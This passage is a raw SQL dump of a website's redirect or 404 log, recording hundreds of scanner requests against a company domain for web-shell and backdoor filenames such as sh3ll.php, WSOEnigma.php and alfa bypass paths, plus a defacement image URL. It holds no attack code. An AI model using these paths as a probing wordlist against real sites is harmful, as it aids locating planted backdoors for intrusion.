00:00:00',301),(47197,'https://www.3s-technologies.com.tr/tr/wsoenigma.php',NULL,'https://www.3s-technologies.com.tr//WSOEnigma.php','',1,0,'2025-09-18 00:36:24','0000-00-00 00:00:00',301),(47198,'https://www.3s-technologies.com.tr/tr/wp-2025.php',NULL,'https://www.3s-technologies.com.tr//wp-2025.php','',1,0,'2025-09-18 00:36:24','0000-00-00 00:00:00',301),(47199,'https://www.3s-technologies.com.tr/tr/xl2023.php',NULL,'https://www.3s-technologies.com.tr//xl2023.php','',1,0,'2025-09-18 00:36:25','0000-00-00 00:00:00',301),(47200,'https://www.3s-technologies.com.tr/tr/templates/beez/index.php',NULL,'https://www.3s-technologies.com.tr//templates/beez/index.php','',1,0,'2025-09-18 00:36:26','0000-00-00 00:00:00',301),(47201,'https://www.3s-technologies.com.tr/tr/xxx.php',NULL,'https://www.3s-technologies.com.tr//xxx.php','',1,0,'2025-09-18 00:36:28','0000-00-00 00:00:00',301),(47202,'https://www.3s-technologies.com.tr/tr/chosen.php',NULL,'https://www.3s-technologies.com.tr//chosen.php','',1,0,'2025-09-18 00:36:29','0000-00-00 00:00:00',301),(47203,'https://www.3s-technologies.com.tr/tr/doc.php',NULL,'https://www.3s-technologies.com.tr//doc.php','',1,0,'2025-09-18 00:36:30','0000-00-00 00:00:00',301),(47204,'https://www.3s-technologies.com.tr/tr/wp-content/themes/seotheme/mar.php',NULL,'https://www.3s-technologies.com.tr//wp-content/themes/seotheme/mar.php','',1,0,'2025-09-18 00:36:31','0000-00-00 00:00:00',301),(47205,'https://www.3s-technologies.com.tr/tr/wp-content/plugins/pwnd-1/pwnd.php',NULL,'https://www.3s-technologies.com.tr//wp-content/plugins/pwnd-1/pwnd.php','',1,0,'2025-09-18 00:36:32','0000-00-00 00:00:00',301),(47206,'https://www.3s-technologies.com.tr/tr/templates/genius/index.php',NULL,'https://www.3s-technologies.com.tr//templates/Genius/index.php','',1,0,'2025-09-18 00:36:33','0000-00-00 00:00:00',301),(47207,'https://www.3s-technologies.com.tr/tr/templates/beez5/index.php',NULL,'https://www.3s-technologies.com.tr//templates/Beez5/index.php','',1,0,'2025-09-18 00:36:34','0000-00-00 00:00:00',301),(47208,'https://www.3s-technologies.com.tr/tr/demo.php',NULL,'https://www.3s-technologies.com.tr//demo.php','',1,0,'2025-09-18 00:36:35','0000-00-00 00:00:00',301),(47209,'https://www.3s-technologies.com.tr/tr/dos.php',NULL,'https://www.3s-technologies.com.tr//dos.php','',1,0,'2025-09-18 00:36:35','0000-00-00 00:00:00',301),(47210,'https://www.3s-technologies.com.tr/tr/components/com_newsfeeds/models/index.php',NULL,'https://www.3s-technologies.com.tr//components/com_newsfeeds/models/index.php','',1,0,'2025-09-18 00:36:36','0000-00-00 00:00:00',301),(47211,'https://www.3s-technologies.com.tr/tr/rec/config.php?p=',NULL,'https://www.3s-technologies.com.tr//rec/config.php?p=','',1,0,'2025-09-18 00:36:37','0000-00-00 00:00:00',301),(47212,'https://www.3s-technologies.com.tr/tr/dropdown.php',NULL,'https://www.3s-technologies.com.tr//dropdown.php','',1,0,'2025-09-18 00:36:38','0000-00-00 00:00:00',301),(47213,'https://www.3s-technologies.com.tr/tr/wp-includes/ixr/index.php',NULL,'https://www.3s-technologies.com.tr//wp-includes/IXR/index.php','',1,0,'2025-09-18 00:36:39','0000-00-00 00:00:00',301),(47214,'https://www.3s-technologies.com.tr/tr/wp-content/plugins/yanierin/akcc.php',NULL,'https://www.3s-technologies.com.tr//wp-content/plugins/yanierin/akcc.php','',1,0,'2025-09-18 00:36:40','0000-00-00 00:00:00',301),(47215,'https://www.3s-technologies.com.tr/tr/templates/raees/error.php',NULL,'https://www.3s-technologies.com.tr//templates/Raees/error.php','',1,0,'2025-09-18 00:36:41','0000-00-00 00:00:00',301),(47216,'https://www.3s-technologies.com.tr/tr/templates/begindot/index.php',NULL,'https://www.3s-technologies.com.tr//templates/BeginDot/index.php','',1,0,'2025-09-18 00:36:42','0000-00-00 00:00:00',301),(47217,'https://www.3s-technologies.com.tr/tr/templates/rhuk_solarflare_ii/error.php',NULL,'https://www.3s-technologies.com.tr//templates/rhuk_solarflare_ii/error.php','',1,0,'2025-09-18 00:36:43','0000-00-00 00:00:00',301),(47218,'https://www.3s-technologies.com.tr/tr/templates/beez2/error.php',NULL,'https://www.3s-technologies.com.tr//templates/Beez2/error.php','',1,0,'2025-09-18 00:36:43','0000-00-00 00:00:00',301),(47219,'https://www.3s-technologies.com.tr/tr/radio.php',NULL,'https://www.3s-technologies.com.tr//radio.php','',1,0,'2025-09-18 00:36:44','0000-00-00 00:00:00',301),(47220,'https://www.3s-technologies.com.tr/tr/.well-known/pki-validation/index.php',NULL,'https://www.3s-technologies.com.tr//.well-known/pki-validation/index.php','',1,0,'2025-09-18 00:36:47','0000-00-00 00:00:00',301),(47221,'https://www.3s-technologies.com.tr/tr/templates/jollyany/index.php',NULL,'https://www.3s-technologies.com.tr//templates/Jollyany/index.php','',1,0,'2025-09-18 00:36:48','0000-00-00 00:00:00',301),(47222,'https://www.3s-technologies.com.tr/tr/admin.php',NULL,'https://www.3s-technologies.com.tr//admin.php','',1,0,'2025-09-18 00:36:49','0000-00-00 00:00:00',301),(47223,'https://www.3s-technologies.com.tr/tr/wp-content/plugins/pwnd/pwnd.php',NULL,'https://www.3s-technologies.com.tr//wp-content/plugins/pwnd/pwnd.php','',1,0,'2025-09-18 00:36:50','0000-00-00 00:00:00',301),(47224,'https://www.3s-technologies.com.tr/tr/templates/jollyany/error.php',NULL,'https://www.3s-technologies.com.tr//templates/Jollyany/error.php','',1,0,'2025-09-18 00:36:51','0000-00-00 00:00:00',301),(47225,'https://www.3s-technologies.com.tr/tr/link.php',NULL,'https://www.3s-technologies.com.tr//link.php','',1,0,'2025-09-18 00:36:52','0000-00-00 00:00:00',301),(47226,'http://3s-technologies.com.tr/tr/ea.php',NULL,'','',7,0,'2025-09-18 10:31:49','0000-00-00 00:00:00',301),(47227,'http://3s-technologies.com.tr/tr/gi.php',NULL,'','',18,0,'2025-09-18 10:31:50','0000-00-00 00:00:00',301),(47228,'http://3s-technologies.com.tr/tr/nov.php',NULL,'','',2,0,'2025-09-18 10:31:50','0000-00-00 00:00:00',301),(47229,'http://3s-technologies.com.tr/tr/anskrit.php',NULL,'','',7,0,'2025-09-18 10:31:52','0000-00-00 00:00:00',301),(47230,'http://3s-technologies.com.tr/tr/habhan.php',NULL,'','',6,0,'2025-09-18 10:31:53','0000-00-00 00:00:00',301),(47231,'http://3s-technologies.com.tr/tr/win.php',NULL,'','',1,0,'2025-09-18 10:31:53','0000-00-00 00:00:00',301),(47232,'http://3s-technologies.com.tr/tr/ut.php',NULL,'','',19,0,'2025-09-18 10:31:54','0000-00-00 00:00:00',301),(47233,'http://3s-technologies.com.tr/tr/ooaiyc.php',NULL,'','',2,0,'2025-09-18 10:31:54','0000-00-00 00:00:00',301),(47234,'http://3s-technologies.com.tr/tr/addle.php',NULL,'','',1,0,'2025-09-18 10:31:55','0000-00-00 00:00:00',301),(47235,'http://3s-technologies.com.tr/tr/nx1.php',NULL,'','',4,0,'2025-09-18 10:31:56','0000-00-00 00:00:00',301),(47236,'http://3s-technologies.com.tr/tr/avtst.php',NULL,'','',1,0,'2025-09-18 10:31:56','0000-00-00 00:00:00',301),(47237,'http://3s-technologies.com.tr/tr/inde.php',NULL,'','',32,0,'2025-09-18 10:31:57','0000-00-00 00:00:00',301),(47238,'http://3s-technologies.com.tr/tr/classgoto24.php',NULL,'','',31,0,'2025-09-18 10:31:57','0000-00-00 00:00:00',301),(47239,'http://3s-technologies.com.tr/tr/die.php',NULL,'','',1,0,'2025-09-18 10:31:59','0000-00-00 00:00:00',301),(47240,'http://3s-technologies.com.tr/tr/bbbb.php',NULL,'','',1,0,'2025-09-18 10:32:00','0000-00-00 00:00:00',301),(47241,'http://3s-technologies.com.tr/tr/3406.php',NULL,'','',3,0,'2025-09-18 10:32:06','0000-00-00 00:00:00',301),(47242,'http://3s-technologies.com.tr/tr/963e.php',NULL,'','',1,0,'2025-09-18 10:32:07','0000-00-00 00:00:00',301),(47243,'http://3s-technologies.com.tr/tr/alpa.php',NULL,'','',24,0,'2025-09-18 10:32:09','0000-00-00 00:00:00',301),(47244,'http://3s-technologies.com.tr/tr/bitch.php',NULL,'','',5,0,'2025-09-18 10:32:09','0000-00-00 00:00:00',301),(47245,'https://www.3s-technologies.com.tr/tr/iletisim\n',NULL,'','',2,0,'2025-09-18 13:11:13','0000-00-00 00:00:00',301),(47246,'http://3s-technologies.com.tr/tr/wp-content/alfa_data/alfacgiapi/bypass.php',NULL,'','',6,0,'2025-09-19 03:19:08','0000-00-00 00:00:00',301),(47247,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentyfour/about.php',NULL,'','',6,0,'2025-09-19 03:19:12','0000-00-00 00:00:00',301),(47248,'http://mail.3s-technologies.com.tr/tr/wp-admin/install.php',NULL,'','',46,0,'2025-09-19 17:08:45','0000-00-00 00:00:00',301),(47249,'http://mail.3s-technologies.com.tr/tr/beta',NULL,'','',2,0,'2025-09-19 17:09:42','0000-00-00 00:00:00',301),(47250,'http://3s-technologies.com.tr/tr/wp-content/akp.php',NULL,'','',3,0,'2025-09-20 02:05:08','0000-00-00 00:00:00',301),(47251,'http://3s-technologies.com.tr/tr/plugins/kontol/wp-crom.php',NULL,'','',3,0,'2025-09-20 02:05:14','0000-00-00 00:00:00',301),(47252,'http://3s-technologies.com.tr/tr/wp-content/plugins/index-path.php',NULL,'','',3,0,'2025-09-20 02:05:16','0000-00-00 00:00:00',301),(47253,'https://www.3s-technologies.com.tr/tr/_ipx/w1080,q75/https:/astralecorp.com/thee-eclipse/83593a52-2a46-44a2-89e4-04b52495e07f_hackedbyeclipse.png',NULL,'https://www.3s-technologies.com.tr/_ipx/w1080,q75/https://astralecorp.com%2Fthee-eclipse%2F83593a52-2a46-44a2-89e4-04b52495e07f_hackedbyeclipse.png','',4,0,'2025-09-20 16:42:48','0000-00-00 00:00:00',301),(47254,'http://www.3s-technologies.com.tr/en/products-en\n',NULL,'','',2,0,'2025-09-20 20:13:23','0000-00-00 00:00:00',301),(47255,'http://3s-technologies.com.tr/tr/granary.php',NULL,'','',2,0,'2025-09-20 20:36:23','0000-00-00 00:00:00',301),(47256,'http://3s-technologies.com.tr/tr/aa21.php',NULL,'','',15,0,'2025-09-20 20:36:23','0000-00-00 00:00:00',301),(47257,'http://3s-technologies.com.tr/tr/finny.php',NULL,'','',12,0,'2025-09-20 20:36:25','0000-00-00 00:00:00',301),(47258,'http://3s-technologies.com.tr/tr/aa18.php',NULL,'','',6,0,'2025-09-20 20:36:26','0000-00-00 00:00:00',301),(47259,'http://3s-technologies.com.tr/tr/anan.php',NULL,'','',5,0,'2025-09-20 20:36:27','0000-00-00 00:00:00',301),(47260,'http://3s-technologies.com.tr/tr/acacia.php',NULL,'','',3,0,'2025-09-20 20:36:28','0000-00-00 00:00:00',301),(47261,'http://3s-technologies.com.tr/tr/folte.php',NULL,'','',3,0,'2025-09-20 20:36:30','0000-00-00 00:00:00',301),(47262,'http://3s-technologies.com.tr/tr/ho.php',NULL,'','',3,0,'2025-09-20 20:36:31','0000-00-00 00:00:00',301),(47263,'http://3s-technologies.com.tr/tr/oldy.php',NULL,'','',1,0,'2025-09-20 20:37:05','0000-00-00 00:00:00',301),(47264,'http://3s-technologies.com.tr/tr/xsox.php',NULL,'','',13,0,'2025-09-20 20:37:05','0000-00-00 00:00:00',301),(47265,'http://3s-technologies.com.tr/tr/ckk.php',NULL,'','',17,0,'2025-09-20 20:37:06','0000-00-00 00:00:00',301),(47266,'http://3s-technologies.com.tr/tr/haa.php',NULL,'','',10,0,'2025-09-20 20:37:07','0000-00-00 00:00:00',301),(47267,'https://3s-technologies.com.tr/tr/v3/assets/blt2a9d21fb69875fd4/blt53d566bc2d5b4519/67c36395c1fe960584550246/landing.svg',NULL,'https://3s-technologies.com.tr/v3/assets/blt2a9d21fb69875fd4/blt53d566bc2d5b4519/67c36395c1fe960584550246/landing.svg','',2,0,'2025-09-22 05:26:26','0000-00-00 00:00:00',301),(47268,'http://3s-technologies.com.tr/tr/shoha.php',NULL,'','',20,0,'2025-09-22 08:51:50','0000-00-00 00:00:00',301),(47269,'http://3s-technologies.com.tr/tr/codicil.php',NULL,'','',2,0,'2025-09-22 08:53:11','0000-00-00 00:00:00',301),(47270,'http://3s-technologies.com.tr/tr/gn.php',NULL,'','',2,0,'2025-09-22 08:53:12','0000-00-00 00:00:00',301),(47271,'http://3s-technologies.com.tr/tr/nxac.php',NULL,'','',3,0,'2025-09-22 08:53:13','0000-00-00 00:00:00',301),(47272,'http://3s-technologies.com.tr/tr/ht.php',NULL,'','',4,0,'2025-09-22 08:53:18','0000-00-00 00:00:00',301),(47273,'http://3s-technologies.com.tr/tr/mds.php',NULL,'','',33,0,'2025-09-22 08:53:22','0000-00-00 00:00:00',301),(47274,'http://3s-technologies.com.tr/tr/nij.php',NULL,'','',8,0,'2025-09-22 08:53:25','0000-00-00 00:00:00',301),(47275,'http://3s-technologies.com.tr/tr/uploxe.php',NULL,'','',5,0,'2025-09-22 08:53:27','0000-00-00 00:00:00',301),(47276,'http://3s-technologies.com.tr/tr/ropyx.php',NULL,'','',3,0,'2025-09-22 08:53:28','0000-00-00 00:00:00',301),(47277,'http://3s-technologies.com.tr/tr/class-config.php',NULL,'','',6,0,'2025-09-22 08:53:29','0000-00-00 00:00:00',301),(47278,'http://3s-technologies.com.tr/tr/jf1d22.php',NULL,'','',4,0,'2025-09-22 08:53:35','0000-00-00 00:00:00',301),(47279,'http://3s-technologies.com.tr/tr/hn.php',NULL,'','',4,0,'2025-09-22 08:53:37','0000-00-00 00:00:00',301),(47280,'http://3s-technologies.com.tr/tr/nl.php',NULL,'','',4,0,'2025-09-22 08:53:37','0000-00-00 00:00:00',301),(47281,'http://3s-technologies.com.tr/tr/er8.php',NULL,'','',4,0,'2025-09-22 08:53:38','0000-00-00 00:00:00',301),(47282,'http://3s-technologies.com.tr/tr/zc-903.php',NULL,'','',6,0,'2025-09-22 08:53:39','0000-00-00 00:00:00',301),(47283,'http://3s-technologies.com.tr/tr/bb2.php',NULL,'','',4,0,'2025-09-22 08:53:40','0000-00-00 00:00:00',301),(47284,'http://3s-technologies.com.tr/tr/aipoyp.php',NULL,'','',4,0,'2025-09-22 08:53:42','0000-00-00 00:00:00',301),(47285,'http://3s-technologies.com.tr/tr/naxc.php',NULL,'','',17,0,'2025-09-22 08:53:45','0000-00-00 00:00:00',301),(47286,'http://3s-technologies.com.tr/tr/fmk.php',NULL,'','',4,0,'2025-09-22 08:53:47','0000-00-00 00:00:00',301),(47287,'http://3s-technologies.com.tr/tr/we2.php',NULL,'','',43,0,'2025-09-22 08:53:49','0000-00-00 00:00:00',301),(47288,'http://3s-technologies.com.tr/tr/zhidagen.php',NULL,'','',4,0,'2025-09-22 08:53:51','0000-00-00 00:00:00',301),(47289,'http://mail.3s-technologies.com.tr/tr/jx.php',NULL,'','',2,0,'2025-09-22 13:46:37','0000-00-00 00:00:00',301),(47290,'http://mail.3s-technologies.com.tr/tr/vanta.php',NULL,'','',5,0,'2025-09-22 13:46:38','0000-00-00 00:00:00',301),(47291,'http://mail.3s-technologies.com.tr/tr/acxx.php',NULL,'','',6,0,'2025-09-22 13:46:40','0000-00-00 00:00:00',301),(47292,'http://mail.3s-technologies.com.tr/tr/filei.php',NULL,'','',2,0,'2025-09-22 13:46:47','0000-00-00 00:00:00',301),(47293,'http://mail.3s-technologies.com.tr/tr/rak.php',NULL,'','',2,0,'2025-09-22 13:46:51','0000-00-00 00:00:00',301),(47294,'http://mail.3s-technologies.com.tr/tr/ee.php',NULL,'','',17,0,'2025-09-22 13:46:52','0000-00-00 00:00:00',301),(47295,'http://mail.3s-technologies.com.tr/tr/222.php',NULL,'','',112,0,'2025-09-22 13:46:57','0000-00-00 00:00:00',301),(47296,'http://mail.3s-technologies.com.tr/tr/xhouf.php',NULL,'','',2,0,'2025-09-22 13:46:58','0000-00-00 00:00:00',301),(47297,'http://mail.3s-technologies.com.tr/tr/public/wsr2.php',NULL,'','',2,0,'2025-09-22 13:47:02','0000-00-00 00:00:00',301),(47298,'http://mail.3s-technologies.com.tr/tr/sad.php',NULL,'','',2,0,'2025-09-22 13:47:03','0000-00-00 00:00:00',301),(47299,'http://www.3s-technologies.com.tr/tr/tcp.php',NULL,'','',1,0,'2025-09-22 14:16:44','0000-00-00 00:00:00',301),(47300,'http://www.3s-technologies.com.tr/tr/jx.php',NULL,'','',1,0,'2025-09-22 14:16:45','0000-00-00 00:00:00',301),(47301,'http://www.3s-technologies.com.tr/tr/vanta.php',NULL,'','',1,0,'2025-09-22 14:16:45','0000-00-00 00:00:00',301),(47302,'http://www.3s-technologies.com.tr/tr/nc4.php',NULL,'','',4,0,'2025-09-22 14:16:46','0000-00-00 00:00:00',301),(47303,'http://www.3s-technologies.com.tr/tr/acxx.php',NULL,'','',1,0,'2025-09-22 14:16:47','0000-00-00 00:00:00',301),(47304,'http://www.3s-technologies.com.tr/tr/ahax.php',NULL,'','',10,0,'2025-09-22 14:16:47','0000-00-00 00:00:00',301),(47305,'http://www.3s-technologies.com.tr/tr/akc.php',NULL,'','',1,0,'2025-09-22 14:16:48','0000-00-00 00:00:00',301),(47306,'http://www.3s-technologies.com.tr/tr/v2.php',NULL,'','',8,0,'2025-09-22 14:16:48','0000-00-00 00:00:00',301),(47307,'http://www.3s-technologies.com.tr/tr/cla.php',NULL,'','',7,0,'2025-09-22 14:16:49','0000-00-00 00:00:00',301),(47308,'http://www.3s-technologies.com.tr/tr/aa17.php',NULL,'','',1,0,'2025-09-22 14:16:49','0000-00-00 00:00:00',301),(47309,'http://www.3s-technologies.com.tr/tr/filei.php',NULL,'','',1,0,'2025-09-22 14:16:50','0000-00-00 00:00:00',301),(47310,'http://www.3s-technologies.com.tr/tr/ot.php',NULL,'','',3,0,'2025-09-22 14:16:51','0000-00-00 00:00:00',301),(47311,'http://www.3s-technologies.com.tr/tr/gfile.php',NULL,'','',6,0,'2025-09-22 14:16:51','0000-00-00 00:00:00',301),(47312,'http://www.3s-technologies.com.tr/tr/rak.php',NULL,'','',1,0,'2025-09-22 14:16:52','0000-00-00 00:00:00',301),(47313,'http://www.3s-technologies.com.tr/tr/cfile.php',NULL,'','',4,0,'2025-09-22 14:16:53','0000-00-00 00:00:00',301),(47314,'http://www.3s-technologies.com.tr/tr/ee.php',NULL,'','',5,0,'2025-09-22 14:16:53','0000-00-00 00:00:00',301),(47315,'http://www.3s-technologies.com.tr/tr/ffile.php',NULL,'','',5,0,'2025-09-22 14:16:54','0000-00-00 00:00:00',301),(47316,'http://www.3s-technologies.com.tr/tr/gold.php',NULL,'','',4,0,'2025-09-22 14:16:55','0000-00-00 00:00:00',301),(47317,'http://www.3s-technologies.com.tr/tr/bless2.php',NULL,'','',4,0,'2025-09-22 14:16:55','0000-00-00 00:00:00',301),(47318,'http://www.3s-technologies.com.tr/tr/lc.php',NULL,'','',4,0,'2025-09-22 14:16:55','0000-00-00 00:00:00',301),(47319,'http://www.3s-technologies.com.tr/tr/222.php',NULL,'','',28,0,'2025-09-22 14:16:56','0000-00-00 00:00:00',301),(47320,'http://www.3s-technologies.com.tr/tr/xhouf.php',NULL,'','',1,0,'2025-09-22 14:16:56','0000-00-00 00:00:00',301),(47321,'http://www.3s-technologies.com.tr/tr/num.php',NULL,'','',12,0,'2025-09-22 14:16:57','0000-00-00 00:00:00',301),(47322,'http://www.3s-technologies.com.tr/tr/slo.php',NULL,'','',2,0,'2025-09-22 14:16:58','0000-00-00 00:00:00',301),(47323,'http://www.3s-technologies.com.tr/tr/ava.php',NULL,'','',6,0,'2025-09-22 14:16:58','0000-00-00 00:00:00',301),(47324,'http://www.3s-technologies.com.tr/tr/public/wsr2.php',NULL,'','',1,0,'2025-09-22 14:16:59','0000-00-00 00:00:00',301),(47325,'http://www.3s-technologies.com.tr/tr/sad.php',NULL,'','',1,0,'2025-09-22 14:16:59','0000-00-00 00:00:00',301),(47326,'http://www.3s-technologies.com.tr/tr/gg.php',NULL,'','',13,0,'2025-09-22 14:17:00','0000-00-00 00:00:00',301),(47327,'http://www.3s-technologies.com.tr/tr/file1.php',NULL,'','',5,0,'2025-09-22 14:17:00','0000-00-00 00:00:00',301),(47328,'http://www.3s-technologies.com.tr/tr/an.php',NULL,'','',17,0,'2025-09-22 14:17:01','0000-00-00 00:00:00',301),(47329,'http://www.3s-technologies.com.tr/tr/great.php',NULL,'','',3,0,'2025-09-22 14:17:02','0000-00-00 00:00:00',301),(47330,'http://www.3s-technologies.com.tr/tr/mo.php',NULL,'','',4,0,'2025-09-22 14:17:03','0000-00-00 00:00:00',301),(47331,'http://www.3s-technologies.com.tr/tr/r4f_1.php',NULL,'','',5,0,'2025-09-22 14:17:04','0000-00-00 00:00:00',301),(47332,'http://www.3s-technologies.com.tr/tr/co.php',NULL,'','',3,0,'2025-09-22 14:17:05','0000-00-00 00:00:00',301),(47333,'http://www.3s-technologies.com.tr/tr/aaaa.php',NULL,'','',1,0,'2025-09-22 14:17:06','0000-00-00 00:00:00',301),(47334,'http://www.3s-technologies.com.tr/tr/good.php',NULL,'','',1,0,'2025-09-22 14:17:06','0000-00-00 00:00:00',301),(47335,'https://3s-technologies.com.tr/tr/images/assets/blt2a9d21fb69875fd4/blt53d566bc2d5b4519/67c36395c1fe960584550246/landing.svg',NULL,'https://3s-technologies.com.tr/images/assets/blt2a9d21fb69875fd4/blt53d566bc2d5b4519/67c36395c1fe960584550246/landing.svg','',2,0,'2025-09-22 17:39:47','0000-00-00 00:00:00',301),(47336,'http://3s-technologies.com.tr/tr/wp-good.php',NULL,'','',172,0,'2025-09-22 19:49:39','0000-00-00 00:00:00',301),(47337,'http://3s-technologies.com.tr/tr/thh.php',NULL,'','',26,0,'2025-09-23 08:57:52','0000-00-00 00:00:00',301),(47338,'http://3s-technologies.com.tr/tr/ico.php',NULL,'','',2,0,'2025-09-23 08:57:53','0000-00-00 00:00:00',301),(47339,'http://3s-technologies.com.tr/tr/wp-aaa.php',NULL,'','',16,0,'2025-09-23 08:57:56','0000-00-00 00:00:00',301),(47340,'http://3s-technologies.com.tr/tr/fv.php',NULL,'','',42,0,'2025-09-23 08:57:58','0000-00-00 00:00:00',301),(47341,'http://3s-technologies.com.tr/tr/ioxi-o2.php',NULL,'','',20,0,'2025-09-23 08:57:59','0000-00-00 00:00:00',301),(47342,'http://3s-technologies.com.tr/tr/sh3ll.php',NULL,'','',7,0,'2025-09-23 08:58:03','0000-00-00 00:00:00',301),(47343,'http://3s-technologies.com.tr/tr/about3.php',NULL,'','',23,0,'2025-09-23 08:58:03','0000-00-00 00:00:00',301),(47344,'http://3s-technologies.com.tr/tr/mlex.php',NULL,'','',30,0,'2025-09-23 08:58:07','0000-00-00 00:00:00',301),(47345,'http://3s-technologies.com.tr/tr/vanta-1.php',NULL,'','',2,0,'2025-09-23 08:58:09','0000-00-00 00:00:00',301),(47346,'http://3s-technologies.com.tr/tr/shellb.php',NULL,'','',4,0,'2025-09-23 08:58:12','0000-00-00 00:00:00',301),(47347,'http://3s-technologies.com.tr/tr/mf.php',NULL,'','',3,0,'2025-09-23 08:58:14','0000-00-00 00:00:00',301),(47348,'http://3s-technologies.com.tr/tr/ahtrew.php',NULL,'','',2,0,'2025-09-23 08:58:25','0000-00-00 00:00:00',301),(47349,'http://3s-technologies.com.tr/tr/push.php',NULL,'','',2,0,'2025-09-23 08:58:27','0000-00-00 00:00:00',301),(47350,'http://3s-technologies.com.tr/tr/simp.php',NULL,'','',5,0,'2025-09-23 08:58:29','0000-00-00 00:00:00',301),(47351,'http://3s-technologies.com.tr/tr/broken.php',NULL,'','',2,0,'2025-09-23 08:58:30','0000-00-00 00:00:00',301),(47352,'http://3s-technologies.com.tr/tr/thai.php',NULL,'','',10,0,'2025-09-23 08:58:31','0000-00-00 00:00:00',301),(47353,'http://3s-technologies.com.tr/tr/wag.php',NULL,'','',3,0,'2025-09-23 08:58:32','0000-00-00 00:00:00',301),(47354,'https://3s-technologies.com.tr/tr/thee-eclipse/zkudziol0zci9lli_svgwebpageato.svg',NULL,'https://3s-technologies.com.tr/thee-eclipse/ZkUdziol0Zci9LlI_SVGWEBPAGEATO.svg','',2,0,'2025-09-23 20:01:31','0000-00-00 00:00:00',301),(47355,'http://3s-technologies.com.tr/tr/fast.php',NULL,'','',3,0,'2025-09-24 05:20:47','0000-00-00 00:00:00',301),(47356,'http://mail.3s-technologies.com.tr/tr/365.php',NULL,'','',1,0,'2025-09-24 11:06:23','0000-00-00 00:00:00',301),(47357,'http://mail.3s-technologies.com.tr/tr/wp-admin/maint/index.php',NULL,'','',49,0,'2025-09-24 11:06:24','0000-00-00 00:00:00',301),(47358,'http://mail.3s-technologies.com.tr/tr/thh.php',NULL,'','',12,0,'2025-09-24 11:06:25','0000-00-00 00:00:00',301),(47359,'http://mail.3s-technologies.com.tr/tr/ico.php',NULL,'','',1,0,'2025-09-24 11:06:27','0000-00-00 00:00:00',301),(47360,'http://mail.3s-technologies.com.tr/tr/hk.php',NULL,'','',16,0,'2025-09-24 11:06:27','0000-00-00 00:00:00',301),(47361,'http://mail.3s-technologies.com.tr/tr/file21.php',NULL,'','',35,0,'2025-09-24 11:06:28','0000-00-00 00:00:00',301),(47362,'http://mail.3s-technologies.com.tr/tr/333.php',NULL,'','',41,0,'2025-09-24 11:06:28','0000-00-00 00:00:00',301),(47363,'http://mail.3s-technologies.com.tr/tr/wp-aaa.php',NULL,'','',7,0,'2025-09-24 11:06:29','0000-00-00 00:00:00',301),(47364,'http://mail.3s-technologies.com.tr/tr/ff2.php',NULL,'','',4,0,'2025-09-24 11:06:30','0000-00-00 00:00:00',301),(47365,'http://mail.3s-technologies.com.tr/tr/cabs.php',NULL,'','',13,0,'2025-09-24 11:06:31','0000-00-00 00:00:00',301),(47366,'http://mail.3s-technologies.com.tr/tr/fv.php',NULL,'','',19,0,'2025-09-24 11:06:32','0000-00-00 00:00:00',301),(47367,'http://mail.3s-technologies.com.tr/tr/ioxi-o2.php',NULL,'','',13,0,'2025-09-24 11:06:32','0000-00-00 00:00:00',301),(47368,'http://mail.3s-technologies.com.tr/tr/akses.php',NULL,'','',6,0,'2025-09-24 11:06:33','0000-00-00 00:00:00',301),(47369,'http://mail.3s-technologies.com.tr/tr/vee.php',NULL,'','',23,0,'2025-09-24 11:06:35','0000-00-00 00:00:00',301),(47370,'http://mail.3s-technologies.com.tr/tr/classgoto24.php',NULL,'','',15,0,'2025-09-24 11:06:35','0000-00-00 00:00:00',301),(47371,'http://mail.3s-technologies.com.tr/tr/klex.php',NULL,'','',12,0,'2025-09-24 11:06:36','0000-00-00 00:00:00',301),(47372,'http://mail.3s-technologies.com.tr/tr/sh3ll.php',NULL,'','',3,0,'2025-09-24 11:06:36','0000-00-00 00:00:00',301),(47373,'http://mail.3s-technologies.com.tr/tr/about3.php',NULL,'','',17,0,'2025-09-24 11:06:37','0000-00-00 00:00:00',301),(47374,'http://mail.3s-technologies.com.tr/tr/te.php',NULL,'','',14,0,'2025-09-24 11:06:37','0000-00-00 00:00:00',301),(47375,'http://mail.3s-technologies.com.tr/tr/wp-freya.php',NULL,'','',11,0,'2025-09-24 11:06:38','0000-00-00 00:00:00',301),(47376,'http://mail.3s-technologies.com.tr/tr/bp.php',NULL,'','',2,0,'2025-09-24 11:06:40','0000-00-00 00:00:00',301),(47377,'http://mail.3s-technologies.com.tr/tr/mlex.php',NULL,'','',12,0,'2025-09-24 11:06:41','0000-00-00 00:00:00',301),(47378,'http://mail.3s-technologies.com.tr/tr/inde.php',NULL,'','',24,0,'2025-09-24 11:06:41','0000-00-00 00:00:00',301),(47379,'http://mail.3s-technologies.com.tr/tr/vanta-1.php',NULL,'','',1,0,'2025-09-24 11:06:42','0000-00-00 00:00:00',301),(47380,'http://mail.3s-technologies.com.tr/tr/ut.php',NULL,'','',13,0,'2025-09-24 11:06:43','0000-00-00 00:00:00',301),(47381,'http://mail.3s-technologies.com.tr/tr/akk.php',NULL,'','',8,0,'2025-09-24 11:06:44','0000-00-00 00:00:00',301),(47382,'http://mail.3s-technologies.com.tr/tr/shellb.php',NULL,'','',2,0,'2025-09-24 11:06:45','0000-00-00 00:00:00',301),(47383,'http://mail.3s-technologies.com.tr/tr/3406.php',NULL,'','',1,0,'2025-09-24 11:06:45','0000-00-00 00:00:00',301),(47384,'http://mail.3s-technologies.com.tr/tr/class-wp.php',NULL,'','',13,0,'2025-09-24 11:06:46','0000-00-00 00:00:00',301),(47385,'http://mail.3s-technologies.com.tr/tr/mf.php',NULL,'','',1,0,'2025-09-24 11:06:48','0000-00-00 00:00:00',301),(47386,'http://mail.3s-technologies.com.tr/tr/anskrit.php',NULL,'','',4,0,'2025-09-24 11:06:48','0000-00-00 00:00:00',301),(47387,'http://mail.3s-technologies.com.tr/tr/gelap.php',NULL,'','',9,0,'2025-09-24 11:06:49','0000-00-00 00:00:00',301),(47388,'http://mail.3s-technologies.com.tr/tr/com.php',NULL,'','',6,0,'2025-09-24 11:06:54','0000-00-00 00:00:00',301),(47389,'http://mail.3s-technologies.com.tr/tr/g.php',NULL,'','',64,0,'2025-09-24 11:06:55','0000-00-00 00:00:00',301),(47390,'http://mail.3s-technologies.com.tr/tr/yes.php',NULL,'','',2,0,'2025-09-24 11:06:55','0000-00-00 00:00:00',301),(47391,'http://mail.3s-technologies.com.tr/tr/finny.php',NULL,'','',7,0,'2025-09-24 11:06:56','0000-00-00 00:00:00',301),(47392,'http://mail.3s-technologies.com.tr/tr/cjfuns.php',NULL,'','',5,0,'2025-09-24 11:06:58','0000-00-00 